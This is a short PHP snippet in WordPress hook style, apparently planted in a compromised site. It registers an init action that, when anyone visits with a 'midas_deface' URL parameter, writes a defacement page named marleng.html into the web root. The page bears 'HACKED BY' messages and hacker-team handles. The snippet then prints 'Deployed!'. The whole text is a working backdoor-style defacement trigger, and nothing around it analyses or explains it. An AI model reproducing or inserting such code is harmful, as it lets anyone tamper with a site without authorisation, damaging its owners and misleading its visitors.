add_action('init', function() {
    if (isset($_GET['midas_deface'])) {
        $target = $_SERVER['DOCUMENT_ROOT'] . '/marleng.html';
        $content = 'HackedByMarleng1337HACKED BY Marleng1337MIDAS HAXOR TEAM0xNuts | Miyomar1337 | Obelix1337 | Marleng1337 | OCTOPUS1312';
        file_put_contents($target, $content);
        echo "Deployed!"; die();
    }
});